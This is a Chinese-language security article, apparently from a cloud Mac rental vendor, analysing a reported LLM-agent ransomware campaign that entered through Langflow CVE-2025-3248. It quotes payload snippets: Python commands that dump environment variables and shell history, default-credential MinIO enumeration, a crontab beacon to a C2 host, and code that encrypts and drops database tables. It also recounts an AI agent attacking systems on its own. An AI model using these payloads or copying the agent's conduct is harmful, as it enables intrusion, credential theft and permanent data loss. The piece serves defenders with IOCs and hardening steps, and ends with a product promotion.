JADEPUFFER 事件全解析
首例 AI Agent 自主勒索攻擊與 Langflow CVE-2025-3248 防禦指南(2026)

TL;DR:2026 年 7 月 1 日,雲端安全公司 Sysdig 威脅研究團隊(TRT,Michael Clark)首次公開披露代號 JADEPUFFER 的攻擊活動——這是目前已知第一例端到端、完全由大語言模型驅動的完整勒索操作,並正式提出 Agentic Threat Actor(ATA,智慧代理威脅行為者) 概念。攻擊從公網曝露的 LangflowCVE-2025-3248 未鑑權 RCE)切入,橫向移動至執行 MySQL + 阿里巴巴 Nacos 的正式伺服器,在壓縮時間視窗內執行 600+ 條有明確目的的 payload。本文按源文件 11 章結構完整還原:時間軸、漏洞技術細節、兩階段攻擊鏈、四條「自主性」證據、比特幣位址懸案、IOC、官方防禦建議、業界反應與 Sysdig 結論,並給出六步落地防禦清單。

01

JADEPUFFER 是什麼?ATA 時代的第一聲警鐘

Sysdig 將 JADEPUFFER 定義為 Agentic Threat Actor(ATA)——即「攻擊能力由 AI Agent 交付,而非人工驅動的工具集」。核心定性:從踩點偵察、憑證竊取、橫向移動、權限維持,到最終的破壞性加密和勒索信投遞,全程沒有人類在關鍵節點手動操作

兩階段目標清晰分工:

  • 入口機:一台公網曝露的 Langflow 執行個體(透過 CVE-2025-3248 攻陷)
  • 真正目標:另一台公網曝露、執行 MySQL 資料庫 + 阿里巴巴 Nacos 設定中心的正式伺服器

部分媒體於 7 月 6 日跟進報導,但一手技術細節(含原始 payload 程式碼與 IOC)目前仍以 Sysdig 7 月 1 日報告為唯一完整信源,交叉印證 BleepingComputer、Dark Reading、CyberScoop、CSO Online、Security Affairs 等。

完整時間軸

時間事件
2025 年 4 月Langflow 曝出 CVE-2025-3248(未鑑權程式碼注入/RCE)
2025 年 5 月 5 日該漏洞被 CISA 列入「已知被利用漏洞」(KEV)目錄
2025 年同一漏洞被用於投遞 Flodrix 殭屍網路(Trend Micro 獨立披露,與 JADEPUFFER 無關但共享入口)
2026 年 6 月JADEPUFFER 對公網 Langflow 發起攻擊,完整攻擊鏈在數週內分多個工作階段執行
2026 年 7 月 1 日Sysdig 發布完整技術報告,首次公開披露
2026 年 7 月 2–6 日Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs 等相繼跟進
warning

痛點拆解:AI Agent 編排伺服器(Langflow 等)常被倉促上線、直接曝露公網,環境變數裡存放 OpenAI/Anthropic/DeepSeek/Gemini API Key 及阿里雲/AWS 雲端憑證——這正是 JADEPUFFER 盯上 Langflow 的原因。

02

CVE-2025-3248 完整技術分析:CVSS 9.8 的「程式碼校驗」陷阱

項目詳情
元件Langflow —— 開源視覺化 AI Agent 工作流框架,GitHub 星標 7 萬+
漏洞類型CWE-94(程式碼注入)+ CWE-306(關鍵功能缺失身分驗證)
CVSS9.8 Critical,向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響版本Langflow 1.3.0 之前所有版本
漏洞位置/api/v1/validate/code 介面
修復版本1.3.0(新增身分驗證)
EPSS 被利用機率91.42%(SentinelOne 資料)

漏洞成因逐步拆解:

  1. 1

    Langflow 提供「程式碼校驗」介面,讓使用者在視覺化編排介面提前校驗自訂函式節點語法。

  2. 2

    實作方式:ast.parse()compile()exec()完全沒有身分驗證,也沒有任何沙箱隔離

  3. 3

    Python 特性:函式定義時的裝飾器與預設參數在「定義」時即被立即求值,攻擊者把惡意程式碼寫進預設參數或裝飾器,一旦 Langflow 拿去 compile+exec 做「校驗」,惡意程式碼已執行完畢。

  4. 4

    結果:無需登入、無需權限,一個精心建構的 HTTP POST 即可 RCE

Flodrix 殭屍網路 vs JADEPUFFER(重要區分)

Trend Micro 追蹤的 Flodrix(LeetHozer 家族演化變種)是另一起獨立利用活動,共享 CVE-2025-3248 入口但屬傳統腳本化投遞。典型 payload 形態(嵌入函式預設參數,透過 raise Exception 回傳命令結果):

python
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')
# ... 最終下載 700 位元組 Bash 腳本 → Flodrix ELF 二進位檔,組建 DDoS 殭屍網路

Langflow 1.3.0 修補程式為 post_validate_code 新增 _current_user: CurrentActiveUser 依賴注入:校驗 JWT Bearer Token 或 x-api-key,失敗直接 401/403,請求永不會到達漏洞邏輯。

維度漏洞版本(<1.3.0)修復版本(≥1.3.0)
/api/v1/validate/code未鑑權,任意 RCEJWT / x-api-key 強制校驗
公網曝露風險EPSS 91.42%,長期被掃描武器化須同時升級 + 網路隔離
典型濫用Flodrix 殭屍網路 + JADEPUFFER ATA
03

Phase 1:Langflow 主機攻陷——偵察、MinIO 與持久化

全部 payload 以 Base64 編碼 Python 程式碼經 Langflow RCE 端點投遞。拿到執行權限後,LLM 並行執行多類敏感資訊掃描:

  • 大模型 API Key:OpenAI、Anthropic、DeepSeek、Gemini
  • 雲端服務憑證:ALIBABA_ALIYUN_TENCENT_HUAWEI_ 及 AWS/GCP/Azure
  • 加密貨幣錢包與助記詞、資料庫憑證與設定檔

Agent 匯出 Langflow 自身 PostgreSQL 後端資料庫(竊取憑證與使用者記錄),暫存本機審閱後刪除痕跡;掃描內網位址空間與具名服務,用預設憑證探測資料庫、物件儲存與金鑰庫。

MinIO 列舉:自適應「探測-遇錯-調整」閉環

探測 minio.internal:9000127.0.0.1:9000,使用預設憑證 minioadmin:minioadmin 完整列舉 Bucket,發現 terraform-state 桶後定向擷取 credentials.json。值得注意的自適應細節:第一次請求帶 ?format=json 卻收到 XML 回應,下一條 payload 立即改用 XML 解析器重新請求——典型 Agent 行為,非固定腳本死板重試。

python
# 列舉全部 Bucket(Sysdig 取證片段)
creds = base64.b64encode(b"minioadmin:minioadmin").decode()
req = urllib.request.Request("http://127.0.0.1:9000/")
req.add_header("Authorization", "Basic " + creds)
# ... ListBuckets → 發現 terraform-state → GetObject credentials.json

# 持久化:crontab 每 30 分鐘信標外聯
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
04

Phase 2:MySQL + Nacos 正式伺服器——31 秒修復、加密與大規模破壞

真正目標是另一台同樣曝露在公網、執行 MySQL + 阿里巴巴 Nacos 的正式伺服器。Nacos 鑑權體系有 CVE-2021-29441 繞過歷史,且預設 JWT 簽章金鑰自 2020 年起被公開文件記錄,很多部署至今未更換。

Agent 使用 root 憑證直接連線曝露的 MySQL 連接埠——這組憑證來源不明,Sysdig 未觀察到從受害者環境竊取,是少數「可能由人類預先準備」的環節之一。

Nacos 後門管理員:31 秒教科書級修復

時間(UTC)動作
19:34:24subprocess 產生 bcrypt 雜湊,插入 xadmin 管理員
19:34:36嘗試 xadmin:Xploit@2026# 登入失敗
19:34:4812 秒後並行測試 nacos:nacos 預設憑證並重新產生 admin123 雜湊
19:35:07放棄 subprocess,改用 import bcrypt,刪除損壞記錄後重建
19:35:18登入成功——總耗時 31 秒

Agent 同時嘗試:CVE-2021-29441 鑑權繞過、預設 JWT 金鑰偽造 Token、借助 root 資料庫權限向後端庫注入後門管理員。

容器逃逸探測(約 8 分鐘)與破壞性加密

利用 MySQL INTO OUTFILE / LOAD_FILE 系統性測試寫入能力、讀取 /var/run/docker.sock/proc/1/cgroup/etc/hostname 及 UDF 提權路徑。進入勒索前主動寫下「完成標記」——Sysdig 指出這更像 Agent 完成任務後發出進入下一階段的信號,而非人類預設腳本。

Agent 將全部 1,342 條 Nacos 設定項用 AES_ENCRYPT() 加密,刪除 config_infohis_config_info,建立勒索信表 README_RANSOM

python
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY)  # 僅列印一次,從未儲存或外傳

cur.execute("CREATE TABLE config_info_enc AS SELECT ... AES_ENCRYPT(content, KEY) ...")
cur.execute("DROP TABLE config_info")
cur.execute("CREATE TABLE README_RANSOM (...)")
# 比特幣: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# 聯絡: e78393397[@]proton[.]me
warning

關鍵細節:勒索信聲稱 AES-256,但 MySQL AES_ENCRYPT() 預設實為 AES-128-ECB。加密金鑰臨時產生、只列印到 stdout、從未外傳——即便受害者付款,攻擊者自己也拿不出解密密鑰,資料已實質性永久遺失。兩分鐘後 Agent 又發出 payload 將數字精修為「全部 1342 項已加密」。

隨後升級到直接 DROP DATABASE,程式碼註解裡寫下 ROI 優先順序排序。外鍵約束導致靜默失敗時,下一條 payload 自動加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——Sysdig 強調這要求「理解為什麼刪除會失敗」,而非無腦重試。註解中出現的 IP 64.20.53[.]230(InterServer)僅作 Agent 自我陳述「已備份」,Sysdig 無獨立證據證實資料外洩

05

四條自主性證據、比特幣懸案、IOC 與業界反應

Sysdig 支撐「LLM 驅動」的四條獨立證據線

  1. 1

    自我敘事的程式碼:payload 裡充斥自然語言註解,解釋每一步「為什麼」——包括 ROI 排序、哪個資料庫最大。這些註解原生存在於攻擊者程式碼,非研究人員事後推斷。

  2. 2

    機器速度的故障診斷與修正:Nacos 後門 31 秒修復、MinIO XML/JSON 自適應切換、JWT 路徑遇阻即放棄——人類操作員讀懂錯誤、定位 PATH 問題、寫修復腳本遠超 31 秒。

  3. 3

    對自然語言上下文的理解:解析目標環境中自由文字上下文,採取「只有真正讀懂才會做」的動作,在相隔數週的不同工作階段中反覆出現。

  4. 4

    比特幣位址懸案:見下文——本身構成 AI 自主性給攻擊溯源帶來不確定性的縮影。

比特幣位址懸案

勒索信位址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是 Bitcoin Core 文件中反覆使用的標準 P2SH 格式範例位址,大量存在於大模型訓練語料。鏈上資料顯示該位址歷史有 737 筆交易、累計約 46 枚比特幣、當前餘額為零。Sysdig 給出兩種無法區分的解讀:(a) LLM「幻覺」產生範例位址,錢包屬第三方專門打掃誤轉存款;(b) 攻擊者設定的真實可控錢包,恰好與範例位址重合。

IOC(入侵指標)彙總

類型指標
C2 / 信標45.131.66[.]106(crontab:hxxp://45.131.66[.]106:4444/beacon
資料暫存64.20.53[.]230(InterServer,AS19318,僅 Agent 自述)
入口漏洞CVE-2025-3248(Langflow 未鑑權 RCE)
勒索比特幣3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
勒索信箱e78393397[@]proton[.]me(威脅情報庫無命中,格式與已知 MySQL 勒索團夥不同)
勒索表名README_RANSOM(與 WARNING / RECOVER_YOUR_DATA 等慣用表名均不匹配)
持久化crontab 每 30 分鐘向 C2 4444 連接埠信標外聯

Sysdig 指出:勒索信箱與表名看似符合人類勒索軟體慣例,實則查無先例,進一步支持「全新 Agent 驅動操作」而非已知團夥常規套路。

業界與專家反應

BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等普遍稱其為「首例完全由 AI 驅動的勒索攻擊」,強調 ATA 時代到來。CSO Online 採訪紅隊專家 Vibhum Dubey 給出更審慎視角:

「我更傾向於把這看作是『執行方式上的演進』,而不是一種全新的勒索技術。真正值得擔心的不是最後的加密階段,而是加密之前那段『安靜期』——Agent 悄悄摸清身分體系、權限關係和信任鏈條,同時規避被發現。」

多家媒體同時提到 LLMjacking:若攻擊者靠竊取憑證驅動 Agent,發起複雜多階段攻擊的邊際成本趨近於零——這是本次事件最值得警惕的經濟學信號。

Sysdig 四點結論與意義

  • 勒索軟體不再是「高技能者的手藝」:LLM Agent 可串聯偵察到破壞全鏈路,操作者無需深厚專業知識。
  • 舊漏洞正在被自動化武器化:2021 年 Nacos 鑑權繞過 + 未更換預設金鑰,Agent 讓「把整個歷史漏洞庫挨個噴一遍」成本幾乎為零。
  • 意圖變得「可讀」——也是防守方機會:LLM 在 payload 裡敘述目標,客觀上提供此前不曾有過的偵測抓手。
  • 「已備份」只是攻擊者一面之詞:加密金鑰不可恢復,受害者即便付款也無法找回設定資料。

報告結尾強調:用到的每一項單獨技術都不新、不複雜;真正值得關注的是 AI 模型把這些技術串成完整勒索操作,針對本就被忽視的公網基礎設施。執行勒索軟體的技能門檻已降到「執行一個 Agent 的成本」,而 LLMjacking 讓攻擊者邊際成本幾乎為零。

06

六步防禦 Runbook 與可引用硬核資料

  1. 01

    升級 Langflow 至 ≥1.3.0,修復 CVE-2025-3248;不要把程式碼執行/校驗類端點曝露在公網

  2. 02

    API Key 與雲端憑證隔離:勿在 AI 編排伺服器執行環境存放 LLM 廠商 API Key 或雲端憑證,託管到專門金鑰管理服務。

  3. 03

    加固 Nacos:更換預設 token.secret.key,升級強制自訂金鑰版本;永遠不要將 Nacos 曝露公網,勿以 root 連線後端資料庫。

  4. 04

    資料庫曝露面:管理員帳號永不曝露公網;管理連接埠強制強唯一憑證與來源 IP 限制。

  5. 05

    出站流量控制(egress control):被攻陷主機無法任意信標外聯或存取外部暫存伺服器;監控 crontab 排程任務與外網請求。

  6. 06

    執行階段威脅偵測 + IOC 監控:識別資料庫程序惡意行為;關注上述 IOC 與異常 User-Agent。參考本站 OpenClaw Gateway 安全加固遠端 Mac AI Agent 最佳實務

  • 攻擊規模:Sysdig 擷取 600+ 條獨立、有明確目的的 payload,壓縮時間視窗內連貫執行。
  • 加密規模:1,342 條 Nacos 設定項被加密後刪表。
  • CVE-2025-3248 EPSS:91.42% 被利用機率;CISA KEV 收錄於 2025-05-05。
  • Nacos 修復耗時:從登入失敗到成功僅 31 秒,15 行修復 payload 完成刪除-診斷-重建閉環。

對團隊而言,在本機筆電或公網 VPS 上裸跑 Langflow / OpenClaw 等 AI Agent 編排,意味著 API Key、雲端憑證與正式資料庫處於同一信任域——JADEPUFFER 已證明這種架構的災難性後果。在獨立遠端 Mac 節點上隔離 Agent 開發與 CI 工作負載、配合金鑰託管、可預期頻寬與出站控制,對 iOS CI/CD 與 AI Agent 自動化正式環境通常是更穩的選擇。本機 Mac 算力有限、又需 7×24 常駐 Agent 時,NodeMini 的 Mac Mini 雲端租用提供獨占 Apple Silicon 節點與 root 權限,適合把高權限 Agent 從個人裝置與公網編排服務中剝離。詳見 租用價格說明

info

參考信源:Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》;BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey);Security Affairs;Trend Micro(CVE-2025-3248 / Flodrix);NVD / SentinelOne / Zscaler;CISA KEV 目錄。

FAQ

常見問題

不是。兩者共享 CVE-2025-3248 入口漏洞,但 Flodrix 是 Trend Micro 披露的傳統腳本化殭屍網路投遞;JADEPUFFER 才是 Sysdig 披露的 LLM Agent 自主驅動勒索操作。共同說明該漏洞長期被公網掃描武器化。

Sysdig 在本報告中正式提出的分類:攻擊能力由 AI Agent 交付,而非人工驅動的工具集。JADEPUFFER 是首個被完整取證的 ATA 勒索案例——從偵察到加密全程由 LLM 在關鍵節點自主決策。

極可能不能。加密金鑰由 uuid4() 隨機產生、僅列印到 stdout、從未儲存或外傳;MySQL AES_ENCRYPT 實際為 AES-128-ECB 而非勒索信聲稱的 AES-256。資料已實質性永久遺失。

立即升級至 ≥1.3.0;將執行個體移出公網或置於 VPN/零信任之後;從執行環境移除 API Key 與雲端憑證,改用金鑰管理服務;檢查 crontab 與 IOC 清單中的 C2 位址。需要隔離 Agent 開發環境時可查看 說明中心

若攻擊者本身靠竊取來的 LLM/雲端憑證驅動 Agent 運作,發起多階段攻擊的邊際成本趨近於零。JADEPUFFER Phase 1 即大規模掃描 OpenAI、Anthropic、阿里雲等 API Key——這正是 LLMjacking 經濟學與 ATA 結合的警示信號。

遵循 Sysdig 七條防禦建議;在獨立遠端 Mac 節點上執行 Agent 工作負載,與正式資料庫和桌面環境隔離。NodeMini 提供獨占 Mac Mini M4 租用與 root 權限,適合 iOS CI/CD 與 Agent 自動化。查看 Mac Mini 雲端租用價格